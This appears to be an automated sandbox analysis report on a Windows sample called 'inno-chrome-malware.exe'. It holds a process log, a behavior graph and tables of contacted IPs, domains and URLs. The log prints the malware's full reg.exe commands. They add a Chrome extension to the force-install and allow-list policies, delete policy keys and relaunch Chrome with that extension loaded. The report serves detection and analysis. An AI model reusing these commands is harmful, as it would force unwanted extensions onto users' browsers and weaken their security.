Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn" /v "version" /t REG_SZ /d 1.0 /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\WOW6432Node\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "3" /t REG_SZ /d jncffhgjbmpggpdflbbkhdghjipdbjkn /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn" /v "path" /t REG_SZ /d "C:\Users\user\AppData\Local\ServiceApp\apps-helper\apps.crx" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn" /v "version" /t REG_SZ /d 1.0 /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn" /v "version" /t REG_SZ /d 1.0 /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\WOW6432Node\Policies\Google\Chrome\ExtensionInstallForcelist" /v "3" /t REG_SZ /d jncffhgjbmpggpdflbbkhdghjipdbjkn /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default
Source: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\ServiceApp\chrome.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\Policies\Google\Chrome /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "3" /t REG_SZ /d jncffhgjbmpggpdflbbkhdghjipdbjkn /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn" /v "path" /t REG_SZ /d "C:\Users\user\AppData\Local\ServiceApp\apps-helper\apps.crx" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn" /v "version" /t REG_SZ /d 1.0 /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\WOW6432Node\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "3" /t REG_SZ /d jncffhgjbmpggpdflbbkhdghjipdbjkn /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn" /v "path" /t REG_SZ /d "C:\Users\user\AppData\Local\ServiceApp\apps-helper\apps.crx" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\jncffhgjbmpggpdflbbkhdghjipdbjkn" /v "version" /t REG_SZ /d 1.0 /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout 1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout 1
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\ServiceApp\InstallExtension.exe Code function: 8_2_00007FF68FF13734 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 8_2_00007FF68FF13734

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Modifies Chrome's extension installation force list
Source: C:\Windows\System32\reg.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\google\Chrome\ExtensionInstallForcelist
windows-stand
Behavior
Click here to start
Slideshow Behavior Animation
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 801008 Sample: inno-chrome-malware.exe Startdate: 07/02/2023 Architecture: WINDOWS Score: 68 131 Multi AV Scanner detection for submitted file 2->131 11 inno-chrome-malware.exe 2 2->11         started        15 InstallExtension.exe 3 2->15         started        17 InstallExtension.exe 2->17         started        19 InstallExtension.exe 2->19         started        process3 file4 99 C:\Users\user\...\inno-chrome-malware.tmp, PE32 11->99 dropped 137 Obfuscated command line found 11->137 21 inno-chrome-malware.tmp 3 13 11->21         started        24 cmd.exe 15->24         started        27 cmd.exe 17->27         started        signatures5 process6 file7 97 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 21->97 dropped 29 inno-chrome-malware.exe 2 21->29         started        135 Uses cmd line tools excessively to alter registry or file data 24->135 33 reg.exe 24->33         started        35 chrome.exe 24->35         started        38 chrome.exe 24->38         started        46 15 other processes 24->46 40 chrome.exe 27->40         started        42 conhost.exe 27->42         started        44 reg.exe 27->44         started        48 11 other processes 27->48 signatures8 process9 dnsIp10 101 C:\Users\user\...\inno-chrome-malware.tmp, PE32 29->101 dropped 143 Obfuscated command line found 29->143 50 inno-chrome-malware.tmp 5 33 29->50         started        145 Modifies Chrome's extension installation force list 33->145 115 192.168.2.30 unknown unknown 35->115 53 chrome.exe 35->53         started        56 chrome.exe 38->56         started        58 chrome.exe 40->58         started        file11 signatures12 process13 dnsIp14 91 C:\Users\user\AppData\Local\...\is-G6FEV.tmp, PE32+ 50->91 dropped 93 C:\Users\user\...\InstallExtension.exe (copy), PE32+ 50->93 dropped 95 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 50->95 dropped 60 cmd.exe 1 50->60         started        63 InstallExtension.exe 6 50->63         started        66 chrome.exe 13 50->66         started        69 cmd.exe 1 50->69         started        117 www.google.com 53->117 119 clients2.google.com 53->119 125 2 other IPs or domains 53->125 121 clients2.google.com 56->121 127 2 other IPs or domains 56->127 123 www3.l.google.com 58->123 129 2 other IPs or domains 58->129 file15 process16 dnsIp17 139 Uses cmd line tools excessively to alter registry or file data 60->139 141 Uses schtasks.exe or at.exe to add and modify task schedules 60->141 71 reg.exe 1 60->71         started        74 conhost.exe 60->74         started        76 reg.exe 1 60->76         started        103 C:\Users\user\AppData\Local\...\reg.xml, XML 63->103 dropped 78 cmd.exe 1 63->78         started        111 192.168.2.1 unknown unknown 66->111 113 239.255.255.250 unknown Reserved 66->113 80 chrome.exe 66->80         started        83 conhost.exe 69->83         started        85 schtasks.exe 1 69->85         started        file18 signatures19 process20 dnsIp21 133 Creates an undocumented autostart registry key 71->133 87 conhost.exe 78->87         started        89 schtasks.exe 1 78->89         started        105 api4.ipify.org 64.185.227.155, 443, 49704 WEBNXUS United States 80->105 107 46-105-201-240.any.cdn.anycast.me 46.105.201.240, 443, 49708 OVHFR France 80->107 109 14 other IPs or domains 80->109 signatures22 process23
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
54.39.156.32
 s4.histats.com Canada
16276 OVHFR false
38.128.66.115
 offerszzzz.click United States
63023 AS-GLOBALTELEHOSTUS false
216.58.209.45
 accounts.google.com United States
15169 GOOGLEUS false
239.255.255.250
 unknown Reserved
unknown unknown false
188.114.96.3
 getfiles.wiki European Union
13335 CLOUDFLARENETUS false
64.185.227.155
 api4.ipify.org United States
18450 WEBNXUS false
35.190.80.1
 a.nel.cloudflare.com United States
15169 GOOGLEUS false
142.250.184.100
 www.google.com United States
15169 GOOGLEUS false
142.250.180.174
 www3.l.google.com United States
15169 GOOGLEUS false
46.105.201.240
 46-105-201-240.any.cdn.anycast.me France
16276 OVHFR false

Private

IP
192.168.2.1
192.168.2.30
127.0.0.1

Contacted Domains

Name IP Active
46-105-201-240.any.cdn.anycast.me 46.105.201.240 true
a.nel.cloudflare.com 35.190.80.1 true
accounts.google.com 216.58.209.45 true
www3.l.google.com 142.250.180.174 true
api4.ipify.org 64.185.227.155 true
s4.histats.com 54.39.156.32 true
getfiles.wiki 188.114.96.3 true
www.google.com 142.250.184.100 true
clients.l.google.com 142.250.180.174 true
offerszzzz.click 38.128.66.115 true
offersss.click 38.128.66.115 true
exturl.com 38.128.66.115 true
clients2.google.com unknown unknown
chrome.google.com unknown unknown
api.ipify.org unknown unknown
s10.histats.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://getfiles.wiki/redirect.php?gjhagdjfbdjk=ODQuMTcuNTIuMTM= false
    		unknown
    https://offerszzzz.click/r.php?payout=OPTIONAL&cnv_id=OPTIONAL false
    • Avira URL Cloud: safe
    		 unknown
    https://api.ipify.org/?format=jsonp&callback=getIP false
      		high
      https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard false
        		high
        https://s10.histats.com/js15_as.js false
          		high
          https://www.google.com/async/newtab_promos false
            		high
            https://s4.histats.com/stats/0.php?4708787&@f16&@g1&@h1&@i1&@j1675809684220&@k0&@l1&@m&@n0&@ohttps%3A%2F%2Fgetfiles.wiki%2Fredirect.php&@q0&@r0&@s0&@ten-GB&@u1280&@b1:-121844902&@b3:1675809684&@b4:js15_as.js&@b5:60&@a-_0.2.1&@vhttps%3A%2F%2Fgetfiles.wiki%2Fredirect.php%3Fgjhagdjfbdjk%3DODQuMTcuNTIuMTM%3D&@w false
              		high
              https://www.google.com/async/ddljson?async=ntp:2 false
                		high
                https://chrome.google.com/webstore/inlineinstall/detail/jncffhgjbmpggpdflbbkhdghjipdbjkn false
                  		high
                  https://getfiles.wiki/favicon.ico false
                  • Avira URL Cloud: safe
                  		 unknown
                  https://getfiles.wiki/redirect.php?gjhagdjfbdjk=ODQuMTcuNTIuMTM= false
                    		unknown
                    https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-GB&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 false
                      		high
                      https://offersss.click/r.php?payout=OPTIONAL&cnv_id=OPTIONAL false
                      • Avira URL Cloud: safe
                      		 unknown
                      https://a.nel.cloudflare.com/report/v3?s=8%2BI6E7uAS71iqsdK54Zdnd9eqpVwk3a6%2FT70ARDCd9dYNsUxs2yyZC3D%2F0jgt%2FRLJZnzi%2Bo72eJmMFnR8sU%2BjUvQDY0SYNlU8W5GQ0uX9RewuU%2Fnxy%2BmwNH88pBrhMzg false
                        		high
                        https://getfiles.wiki/redirect.php false
                        • Avira URL Cloud: safe
                        		 unknown
                        https://www.google.com/async/newtab_ogb?hl=en-GB&async=fixed:0 false
                          		high
                          https://exturl.com/r.php?key=pvwarw3 false
                          • Avira URL Cloud: safe
                          		 unknown
                          https://getfiles.wiki/welcome.php false
                          • Avira URL Cloud: safe
                          		 unknown
                          https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw false
                            		high
                            https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-GB&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc false
                              		high